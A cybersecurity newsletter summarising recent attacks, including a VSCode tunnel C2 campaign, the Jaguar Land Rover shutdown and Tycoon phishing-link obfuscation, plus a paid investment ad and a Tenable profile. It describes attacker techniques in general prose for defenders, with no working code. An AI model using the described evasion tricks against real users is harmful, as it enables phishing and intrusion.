CYBERCRIMINALS ARE ALREADY IN YOUR SERVERS... DO YOU THINK YOU'RE PROTECTED ?

In partnership with

🤖 Dear internet users and fellow Cyberdefenders,

Cybercriminals no longer try to force the doors. They bypass them. They exploit our tools, speak our language, use our own systems against us. 

A Velociraptor here, a hijacked Visual Studio Code there. Nothing abnormal at first glance… until production stops. Until the indicators go haywire. Until the digital silence becomes deafening. 

In 2025, the battlefield has changed. The enemy is methodical, patient, organized. They infiltrate, observe, then strike—often without warning. 

Like in Halewood, at Jaguar Land Rover, or in the clouds of Asia where east-west traffic has become their favorite playground. But all is not lost. 

In this tactical briefing, you will discover how :

• Modern SOCs now track internal movements;

• Phishing is adapting to the habits of Teams and your employees;

• Startups like NexaTrace are changing the game in the digital fight.

🎙️ Mobilize your units. Train your analysts. And above all, open your eyes. Because the enemy is no longer at the gate. They are in your systems. 

Do you want to survive in this world? Then read to the end. And stay alert.

Highlights :

👉 Swiss Post Cybersecurity sounds the alarm: hacking is inevitable 🔐 

👉 Hackers hijack Visual Studio Code to open invisible C2 tunnels 🕳️

👉 Jaguar Land Rover paralyzed: when cyber sabotage halts production 🏭

👉 Phishing 2.0: the Tycoon kit and its impossible-to-detect links 🎯

👉 Are your servers hiding a silent intruder? East-West traffic in the spotlight 🕵️

If this letter was forwarded to you, subscribe by clicking this link 

🗞️​ Guess what ?

How 433 Investors Unlocked 400X Return Potential

Institutional investors back startups to unlock outsized returns. Regular investors have to wait. But not anymore. Thanks to regulatory updates, some companies are doing things differently.

Take Revolut. In 2016, 433 regular people invested an average of $2,730. Today? They got a 400X buyout offer from the company, as Revolut’s valuation increased 89,900% in the same timeframe.

No wonder 10K+ everyday people are taking the chance on Pacaso.

Founded by a former Zillow exec, Pacaso’s co-ownership tech reshapes the $1.3T vacation home market. They’ve earned $110M+ in gross profit to date, including 41% YoY growth in 2024 alone. They even reserved the Nasdaq ticker PCSO.

The same institutional investors behind Uber, Venmo, and eBay backed Pacaso. And you can join them. But not for long. Pacaso’s investment opportunity ends September 18.

Invest While You Still Can

_{Paid advertisement for Pacaso’s Regulation A offering. Read the offering circular at invest.pacaso.com. Reserving a ticker symbol is not a guarantee that the company will go public. Listing on the NASDAQ is subject to approvals.}

🤓​ Would you like to know more?

1️⃣​ Swiss Post Cybersecurity sounds the alarm : hacking is inevitable

Summary : Paul Such, CEO of Swiss Post Cybersecurity, reflects on two decades of evolution in the cybersecurity field. According to him, 2025 marks a turning point : all companies, regardless of their size, must adopt an assume breach posture. SMEs remain particularly vulnerable, often ill-prepared or poorly advised. The growing complexity of attacks, especially those targeting IT suppliers, demands heightened vigilance. Swiss Post Cybersecurity positions itself as a key player, offering services that cover the entire spectrum: consulting, monitoring, incident response, and strategic support.  

Details :

• Evolution of the cyber paradigm: The "assume breach" approach redefines cyber strategy: the goal is no longer to prevent a hypothetical intrusion, but to organize resilience around a compromise considered a given. This implies a profound cultural shift, particularly within SMEs.  

• SMEs on the front line: Lack of resources, absence of strategy, reliance on underqualified providers… French-speaking Swiss SMEs are ideal targets. Paul Such advocates for a practical, pragmatic cybersecurity approach adapted to their reality.  

• Supply chain: the systemic Achilles' heel: Rebound attacks via IT suppliers are becoming the norm. Regularly assessing the cyber maturity of partners is becoming as critical as evaluating their financial health or GDPR compliance.  

• Pressure from boards of directors: A strong new trend: management now demands clear KPIs for cybersecurity (response time, patching rates, blocked incidents, etc.). The CISO can no longer get by with technical jargon alone.  

• Swiss Post Cybersecurity: sovereignty and national coverage: The Swiss entity positions itself as a 100% Swiss trusted third party, combining local intervention, a broad spectrum of skills, and independence from US giants.

What should be remembered ?

Adopting a proactive posture is not just a technical necessity but a strategic imperative. The assume breach paradigm requires considering infiltration as inevitable and organizing defenses accordingly. This involves culture, budget, metrics, and management involvement. 

 —————————————————————————

2️⃣ Hackers hijack Visual Studio Code to open invisible C2 tunnels

Summary : An attacker group has innovated by hijacking the open-source forensic tool Velociraptor to establish command and control (C2) channels using Visual Studio Code. This attack relies on legitimate components, allowing it to bypass many traditional protections. Using Cloudflare infrastructure, the attackers deploy malicious MSIs and encoded PowerShell scripts to achieve remote execution. Sophos warns: this type of activity should be considered a precursor to ransomware. Companies are urged to monitor unauthorized use of open-source tools and strengthen their behavioral detection.

Details :

• Living-Off-the-Land 2 .0 : Using legitimate tools like Velociraptor and VSCode allows attackers to operate without triggering alerts. This approach is part of an advanced strategy for persistence and evasion.  

• Hijacked Cloud Infrastructure : Cloudflare Workers, often considered neutral, becomes an operational staging point here. The attack thus bypasses classic protections through the apparent innocence of the traffic flows.  

• Offensive use of msiexec : Microsoft's standard tool, present on every machine, is used to inject payloads. This helps avoid suspicious executables or abnormal behaviors detected by EDR.  

• Encoded PowerShell Command : The attack relies on obfuscated PowerShell scripts to download and execute VSCode with the tunnel flag active—a completely repurposed but effective use for C2.  

• Precursor to ransomware : The observed activity is not a final objective but a reconnaissance and preparation phase for a more destructive attack. Sophos recommends interpreting this type of pattern as a critical weak signal.  

What should be remembered?

This attack demonstrates that SaaS integrations can become backdoors. Companies must strengthen their OAuth token management, segment access, and actively monitor their API logs.

 ——————————————————————

3️⃣​ Jaguar Land Rover paralyzed: when cyber sabotage halts production

Summary : Jaguar Land Rover (JLR) has suffered a major cyberattack that has paralyzed its production and sales activities. Although the company claims that customer data has not been compromised, the immediate reaction—a complete shutdown of systems—shows the severity of the incident. Experts believe the attack targeted industrial systems (OT). This type of threat, often linked to ransomware, highlights the vulnerability of large companies at the intersection of the digital and physical worlds. The incident occurs in a tense economic context for JLR, which is already facing revenue declines and production delays. 

Details:

• Sudden shutdown, an indicator of severity: The immediate suspension of production operations suggests an attack targeting critical OT or ERP systems. Few incidents cause a complete shutdown without damage already being underway.  

• Strategic interruption during a sales period: The incident occurs at a key moment for dealerships (launch of the 75 registration plate), directly impacting sales and cash flow. The timing of the attack is likely not a coincidence.  

• Vague investigation, minimal communication: The ambiguity surrounding the origin of the attack and the refusal to confirm or deny ransomware are fueling speculation. In March, the Hellcat group claimed responsibility for a breach at JLR.  

• HR and reputational impacts: JLR is already undergoing an internal restructuring phase with 500 job cuts. This incident could affect its employer brand and the trust of industrial partners.  

• Signs of a targeted sabotage?: The rapid propagation suggested by the complete shutdown could indicate a deep compromise, or even a supply chain attack affecting multiple sites simultaneously.

What should be remembered ?

Attacks on critical infrastructure illustrate the paradigm shift in industrial cybersecurity. It is no longer just data, but production capabilities themselves that are becoming the primary target.

  ————————————————————-

4️⃣​ Phishing 2.0: the Tycoon kit and its impossible-to-detect links

Summary : The Tycoon phishing-as-a-service kit is innovating with obfuscation techniques that trick both users and automated filters. The manipulation of URLs via invisible characters, redundant protocols, or deceptive subdomains makes attacks almost undetectable. Tycoon also relies on lure pages with CAPTCHAs to gain victims' trust. Barracuda and Keepnet note an explosion of these attacks, particularly via Microsoft 365 and documents embedding malicious QR codes. Phishing remains the main entry point for cyberattacks and is evolving faster than traditional protections.

Details:

• Next-generation URL camouflage: Tycoon uses sequences of invisible characters (e.g., %20, Unicode) to conceal the true destination of the link, thus evading traditional URL filters.  

• Multi-strategy social engineering: Campaigns include fake IT support on Teams, fake CAPTCHA pages, and credible pretexts (maintenance, ticket, M365) to encourage interaction.  

• Protocol redundancy attacks: Links integrate multiple HTTP prefixes or addresses with "@" symbols, where the displayed domain is just a decoy. The user is redirected to a hidden malicious domain.  

• Explosion of malicious QR codes: Used in 83% of infected documents (PDF, Office), they bypass email protections, especially on mobile where URL visibility is limited.  

• Self-service PhaaS: Tycoon offers ready-to-use templates, tracking dashboards, and regular updates to its evasion techniques. Phishing is becoming a turnkey industry.  

What should be remembered?

Tycoon illustrates the professionalization of phishing, now sold as an accessible service. The speed at which these tactics evolve requires constant renewal of awareness and detection strategies.  

5️⃣ Are your servers hiding a silent intruder? East-West traffic in the spotlight

Summary : While most companies focus on perimeter security (north-south traffic), modern attacks exploit internal east-west traffic to spread discreetly. Known as "lateral movement," this phenomenon was responsible for over 80% of intrusions in APAC in 2024. The LockBit attack against the Indonesian government illustrates the damage an undetected intruder can cause. The lack of visibility into these internal movements constitutes a critical blind spot. The solution lies in deep observability: combining network telemetry with logs for enhanced real-time visibility.

Details:

• Mutation of the defensive perimeter: The growing volume of east-west traffic in cloud-native architectures makes any defense focused solely on inbound/outbound flows obsolete.  

• Blind spots exploited by APTs: Advanced attackers exploit the operational latency of SOCs in correlating internal events. Lateral movement becomes invisible without intra-infrastructure network visibility.  

• Insufficient and ephemeral logs: Disabled agents, corrupted or overloaded logs… noise masks the weak signals. Only raw traffic (packets) provides an unalterable trace of malicious actions.  

• Controlled decryption of internal flows: New technologies allow for the inspection of internal TLS traffic without compromising confidentiality or performance, making weak signals hidden in SSL tunnels visible.  

• Convergence with Zero Trust: Deep observability helps validate segmentation policies, detect behavioral deviations, and feed adaptive controls—a cornerstone of the Zero Trust model.

What should be remembered?

Not seeing what is happening between internal systems is like letting the enemy roam freely. East-west visibility is becoming the foundation of a resilience strategy against modern threats.  

LIEUTENANT’S REPORT 🏆

Tenable : The commander-in-chief of vulnerability management on all fronts

Tenable, based in Columbia, Maryland (USA), is one of the global leaders in vulnerability management and attack surface reduction. Founded in 2002 and listed on Nasdaq (TENB), the company employs approximately 1,500 people and generates nearly $800 million in annual revenue. It offers a comprehensive portfolio of solutions including cloud security, Active Directory security, patch management, vulnerability detection, and Breach and Attack Simulation (BAS).  

Noteworthy :

Tenable stands out for its integrated approach centered on the visibility of real risks. In 2025, the vendor was once again recognized in eSecurity Planet's top 10 provider ranking, thanks to its advanced capabilities in correlating vulnerabilities, critical assets, and active threats. Its flagship tool, Tenable One, is particularly valued by large corporations for its ability to unify vulnerability management across multiple environments (on-prem, cloud, IT/OT). The company does not just identify flaws: it also offers prioritization based on business context, making it a true strategic ally for CISOs.

CYBERTRIVIA - DID YOU KNOW ? 🤔

Without an attack, without malware, without an alert: the other face of cloud cyberespionage

Did you know that an attacker can spy on the network activity of a public cloud… without ever triggering an alert ?

A study by security researchers revealed that some misconfigured cloud services allowed a malicious actor to deploy passive sensors to monitor internal data flows, without exploiting any known vulnerability. 

In some cases, simply subscribing to the same cloud provider as the target was enough to intercept network metadata or identify the internal IP addresses being used. 

The result: weeks of stealthy espionage, with no direct intrusion or malicious files. It is a brutal demonstration of a simple principle : just because it's in the cloud doesn't mean it's invisible.

👉️ Let me know if you need further adjustments !